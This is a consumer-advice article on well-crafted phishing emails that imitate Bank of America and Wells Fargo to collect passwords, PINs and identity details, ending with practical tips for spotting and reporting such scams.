Maybe you think you can spot scam emails by the broken English, the pleas to wire money via Western Union and the references to Nigerian princes. Think again. The latest phishing attacks are so well-crafted, they look exactly like emails you might receive from major banks like Wells Fargo and Bank of America, says Ondrej Krehel, information security officer at Identity Theft 911, Credit.com’s sister company.
“It’s very sophisticated,” Krehel says. “Hackers are creating these pages to look exactly like professionally crafted bank pages. So it does have the look and feel and touch of your bank’s website.”
One recent email was noteworthy simply because it managed to sneak past Identity Theft 911’s multiple firewalls and land in Krehel’s inbox. It appeared to come from Bank of America, even using a real no-reply email address from the bank itself as the sender, as opposed to an obvious fake like Hotmail or Yahoo.com.
Once opened, the email doesn’t deploy any malware to steal users’ passwords or snoop their computers (such malicious code would have been blocked by Krehel’s firewall). Instead, it informs the user that there’s been a serious problem with her account, and she needs to complete and return the attached form.
“The text of the email is very well crafted,” Krehel says. “It looks like something Bank of America would actually send you.”
The scammers didn’t even include any malware in the attachment, since that also would sound alarms within users’ anti-spyware programs. Instead, the attachment looks just like a page created by Bank of America itself.
The real Bank of America logo appears across the top of the file—clicking on it takes the user to the bank’s actual site. The color scheme, with red and grey horizontal ribbons, and numbers in blue circles, precisely mimics the look of all the bank’s other communications. Even the mix of methods to input information, with drag-down boxes, checkboxes and places to type in text, are crafted exactly like the real thing.
The hackers are so good, in fact, that they customize the attachments to different banks. Another attachment Krehel received a few months ago had the exact same level of detail, only it spoofed the look and feel of Wells Fargo’s website.
“This is about collecting users’ data, and not triggering any antivirus” software, Krehel says. “So it’s the user driving the action.”
The attachment asks users to input all the information about their accounts, including their passwords, PINs, birthdates, Social Security numbers, driver’s license numbers, and the maiden and middle name of their mothers, plus six different security challenge questions, such as “Your first pet’s name.”
This, actually, is one clue to figuring out that it’s a scam, Krehel says. Banks may occasionally ask customers to verify information about a certain transaction. If you’ve never been to Hong Kong but suddenly your credit card goes on a shopping spree there, you might get a phone call from Bank of America, or an email asking you to call the bank. But banks never, ever, ask customers to confirm the security details of their accounts via email.
“If they have a problem with the account itself, they’ll probably shut down the account entirely and call the person, or email them and ask them to call a secure number,” Krehel says.
Second, the sheer number of security questions should raise alarm bells in the user’s mind, Krehel says. The one purporting to be from Bank of America even asked for the user’s email password and their father’s middle name, information that Bank of America itself does not need to know.
“It’s just overkill, the number of questions asked in one email,” says Krehel.
The takeaway: Phishing scammers are getting a lot more sophisticated. Here are some tips to avoid getting scammed:
- Pay attention. We get so many emails these days, it’s easy to go into autopilot. As long as a message doesn’t look like an obvious fake, with pitches for Canadian Viagra or Nigerian princes, we’re likely to distractedly click on just about anything. But especially when an email says it’s from your bank or credit union, it’s time to stop zoning out and pay attention.
- Just because it looks and feels real doesn’t mean it is real. Scammers know how your bank crafts its communications. Be alert.
- Remember: Banks don’t ask customers to confirm account security details online. Ever. If you receive an email asking you to do this, it is—by definition!—a scam.
- It’s OK to do nothing. Never click “respond” to any emails you suspect may be fraudulent. Never open any attachments. Never press “Continue” or “Next” on any attachment. Any time you interact with a scammer, you increase your risk of getting scammed.
- Call your bank. If you have any questions at all, just call. Anyone at your local branch should be able to figure out whether the email you received was real or a scam.
- Report the phishing email by forwarding it, without responding to it or making any alterations, to: firstname.lastname@example.org.
- Ensure that your computer, smartphone, or browsing gadget is running security software, and that you keep it current by downloading all the latest updates.
- For more information, and an up-to-date listing of recent phishing attacks, check out Antiphishing.org. It’s a great educational resource.
Image: zetrules, via Flickr.com